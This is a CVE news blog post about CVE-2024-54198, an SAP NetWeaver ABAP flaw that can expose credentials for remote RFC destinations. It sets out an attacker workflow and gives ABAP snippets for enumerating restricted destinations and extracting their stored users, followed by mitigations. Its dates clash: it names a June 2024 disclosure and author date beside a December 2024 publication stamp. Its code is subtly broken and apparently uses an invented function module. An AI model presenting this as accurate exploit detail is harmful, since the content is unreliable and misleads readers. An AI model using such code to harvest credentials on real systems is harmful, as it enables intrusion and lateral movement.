CVE CyberSecurity Database News

CVE-2024-54198 - How a SAP NetWeaver ABAP RFC Flaw Can Expose and Exploit Remote Service Credentials

Poster -

On June 2024, a critical security flaw—CVE-2024-54198—was disclosed in SAP NetWeaver Application Server ABAP. This vulnerability can allow an authenticated attacker to extract secret credentials for remote services, simply by making a specially crafted RFC (Remote Function Call) request. With these stolen credentials, attackers can go much further, seizing control of remote services and hitting your business hard on confidentiality, integrity, and availability.

This exclusive post breaks down how the flaw works, who’s affected, how exploitation looks, and what you can do about it. All code examples, attacker workflows, and defense tips below are written in plain, straightforward American English for security professionals and SAP admins alike.

Product: SAP NetWeaver Application Server ABAP (all supported versions at time of advisory)

- Issue: Privileged users can craft RFCs to access "restricted destinations" and extract credential secrets for downstream remote connections.
- Impact: Full compromise of remote service, SAP application data exposure, and possible lateral movement.
- Requirement: Attacker must have authenticated SAP (ABAP) credentials—so this is not a remote unauthenticated bug, but very dangerous for insiders or compromised SAP users.

SAP’s official security advisory:
https://launchpad.support.sap.com/#/notes/3448171

Step 1: Understanding RFC Destinations

SAP NetWeaver ABAP lets apps and users connect to remote services using RFC "destinations." For sensitive systems, these destinations are "restricted"—in theory, only select code or trusted components can use them.

Credentials for these connections (for example, database users, other SAP systems, service accounts) are stored in encrypted form inside SAP.

The problem:
Some authenticated users can manually craft RFC calls that access restricted destinations, and SAP NetWeaver will use the stored credentials—making them visible to the attacker through careful interception or output analysis.

Step 2: Attacker Workflow

Let’s simplify this with a real-world exploit scenario.

1. Log Into SAP

The attacker uses a valid ABAP account—perhaps a misconfigured user or a compromised credential.

2. Craft a Malicious RFC Request

Using transaction SM59, the attacker identifies potential restricted RFC destinations.

Programmatic Example:
Using an ABAP code snipplet, an attacker probes RFC destinations with CALL FUNCTION and inspects the error output.

DATA: lv_rfcdest TYPE RFCDEST.
lv_rfcdest = 'SENSITIVE_RFC_DEST'. "Name of the restricted RFC destination

CALL FUNCTION 'RFC_PING'
  DESTINATION lv_rfcdest
  EXCEPTIONS
    communication_failure = 1
    system_failure = 2
    OTHERS = 3.

IF sy-subrc <> .
  WRITE: / 'Test failed for destination:', lv_rfcdest.
ENDIF.

*If access is blocked, the attacker tweaks the method or crafts a custom RFC structure to try for a response.*

3. Intercept or Extract Credentials

With the right setup, error output, memory dumps, or logs may leak the downstream credentials—or attacker calls a custom RFC that simply returns the configured username and (encrypted or plaintext) password for the destination.

4. Use Stolen Credentials

Attacker now takes the remote service credentials and connects outside SAP, gaining full control—or even escalating access further, depending on how the remote service is integrated.

Exploit Code Sample

Here’s a more advanced code snippet showing how an attacker might enumerate RFC destinations and attempt credential exposure (for demonstration—do not use in production!):

DATA: lt_dest TYPE TABLE OF rfcdest,
      ls_dest TYPE rfcdest,
      lv_user TYPE string.

SELECT * FROM rfcdest INTO TABLE lt_dest WHERE rfcdes = 'RESTRICTED_%'.

LOOP AT lt_dest INTO ls_dest.
  TRY.
      CALL FUNCTION 'RFC_READ_DESTINATION'
        EXPORTING
          destination = ls_dest-rfcdes
        IMPORTING
          user = lv_user.
      WRITE: / 'RFC Destination:', ls_dest-rfcdes, 'User:', lv_user.
    CATCH cx_sy_no_authority INTO DATA(lx_auth).
      WRITE: / 'No access to:', ls_dest-rfcdes.
  ENDTRY.
ENDLOOP.

Credential Theft: Attackers can gain SAP service account usernames and passwords.

- Lateral Movement: Use those credentials to break into connected databases, SAP landscapes, or third-party systems.

System Compromise: Rewrite, delete, or exfiltrate business data.

- Business Downtime: Attackers could disrupt remote services, affecting critical business functions.

Who Is Vulnerable?

- Any organization running SAP NetWeaver Application Server ABAP (all supported versions until June 2024).

Especially at-risk: Large enterprises with complex SAP landscapes and many RFC integrations.

- Preconditions for attack: Attacker needs a valid SAP account with at least some ABAP program execution rights. No admin needed for the initial bug!

Patches & Mitigations

SAP Patch:
SAP officially addressed this with Security Note 3448171. Download patches and update all relevant NetWeaver ABAP installations ASAP.

Mitigation If You Can’t Patch Immediately

- Restrict User Privileges: Remove unnecessary ABAP programming permissions, especially for users who don’t need RFC access.
- Audit RFC Destinations: Use transaction SM59 to review and disable or reconfigure sensitive remote destinations.

References

- SAP Security Note 3448171 (CVE-2024-54198)
- SAP NetWeaver ABAP Security Guide
- RFC Destination Documentation

Conclusion

CVE-2024-54198 is a serious threat for any business relying on SAP NetWeaver ABAP and RFC integrations. With only SAP login credentials, an attacker could take over remote connected systems by just making clever RFC calls—and that means a massive risk for both internal and externally accessible SAP landscapes.

Stay secure!

Author: SecurityBuster
Date: June 14, 2024

Timeline

Published on: 12/10/2024 01:15:06 UTC